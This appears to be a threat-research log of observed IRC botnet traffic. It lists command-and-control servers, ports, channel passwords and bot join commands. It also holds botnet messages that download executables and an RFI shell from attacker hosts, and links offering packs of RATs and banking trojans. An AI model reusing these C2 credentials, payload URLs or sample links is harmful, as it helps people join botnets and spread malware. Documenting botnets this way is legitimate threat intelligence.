Remote Host Port Number
209.172.59.146 5794 PASS ngrBot
213.251.170.52 80
74.53.197.4 80
NICK n{US|XPa}pvcbajf
USER pvcbajf 0 0 :pvcbajf
JOIN #butowski ngrBot
PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) – Redirected 15 domain(s)
The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://conectaamor.com/_server/editor/images/dominios.txt
EXE File: http://conectaamor.com/_server/editor/images/fudnew2.exe
RFI SHELL: http://conectaamor.com/_server/editor/images/lang.php
irc.raidzone.net (IRC botnet hosted in United States Lansing Liquid Web Inc)
50.28.21.18:8890
Nick: New|AUT|1244036|XP
Username: 7665336
Joined Channel: #pedophiliac with Password YDARIO
Remote Host Port Number
50.28.21.18 7659 PASS fuck
NICK [3151|USA|XP|Z3R0x]
USER 3151 "" "lol" :3151
JOIN #pedophiliac YDARIO
PONG 422
Hosting info: http://whois.domaintools.com/50.28.21.18
42 MB malware samples
This package has a lot of RATs and banking trojans inside. Have fun. Download: http://c3266cfc.tubeviral.com
115.239.230.73 (IRC botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)
Remote Host Port Number
115.239.230.73 6943 PASS laorosr
213.251.170.52 80
31.184.237.43 80
98.126.35.112 80
MODE [N00_USA_XP_1295223] @ -ix
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 |
92.241.165.115 (IRC botnet hosted in Russian Federation Oao Webalta)
Remote Host Port Number
213.251.170.52 80
92.241.165.115 1863 PASS ngrBot
NICK n{US|XPa}qgaqcrq
USER qgaqcrq 0 0 :qgaqcrq
JOIN #start romeo
Now talking in #start
Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ]
Topic By: [ ecu ]
Hosting info: http://whois.domaintools.com/92.241.164.67
c0re.su (IRC botnet hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number
c0re.su 4443
NICK N[USA|XP][yiowryo]
USER yiow "" "lol" :yiow
JOIN #b0ts
NICK N[USA|XP][uuobuyk]
USER uuob "" "lol" :uuob
NICK [USA-XP][ftlizjn]
USER 2844 "" "TsGh" :2844
JOIN #botz
NICK [USA-XP][qirnfam]
USER 9143 "" "TsGh" :9143
NICK [n][USA-XP][ihcnykp]
USER 2550 "" "TsGh" :2550
Hosting info: http://whois.domaintools.com/46.17.100.229
91.215.159.137 (IRC botnet hosted in Netherlands Amsterdam Infinite Technologies Internet Solutions Limited)
Remote Host Port Number
112.78.8.20 80
195.122.131.3 80
213.251.170.52 80
91.215.159.137 1866 PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/2997295683/nap.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}aytockz
USER aytockz 0 0 :aytockz
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP
193.107.16.111 (IRC botnet hosted in Seychelles Ideal Solution Ltd)
Remote Host Port Number
193.107.16.111 7654 PASS ngrBot
213.251.170.52 80
66.45.255.234 80
NICK n{US|XPa}cucqohu
USER cucqohu 0 0 :cucqohu
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://gloimpsa.com/js/expressInstall.swf.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe" – Download retries: 0
Hosting info: http://whois.domaintools.com/193.107.16.111
tinker.weedns.com (IRC botnet, Mouse's net again)
Remote Host Port Number
tinker.weedns.com 3305 PASS secretpass
Resolved : [tinker.weedns.com] To [173.9.72.212]
Resolved : [tinker.weedns.com] To [222.124.178.155]
Resolved : [tinker.weedns.com] To [66.238.151.86]
Resolved : [tinker.weedns.com] To [188.165.200.48]
Resolved : [tinker.weedns.com] To [74.210.208.163]
NICK yf69xrls6
USER rb6c2qqku * 0 :USA|XP|115
JOIN #mm RSA
Topic On: [ #mm ] [ +yOfS7/ZgRdB.u97R71RybXB/ubyOC/gLWja.029Cg1ae4NB/TcaF4.m9cnf/dRE2M0IU0Az0JjgIw/Pu691.6bET91ANj0U. ]
22 MB malware samples
Size: 22 MB. Different malware samples inside; have fun reversing. Download: http://8efc580b.tubeviral.com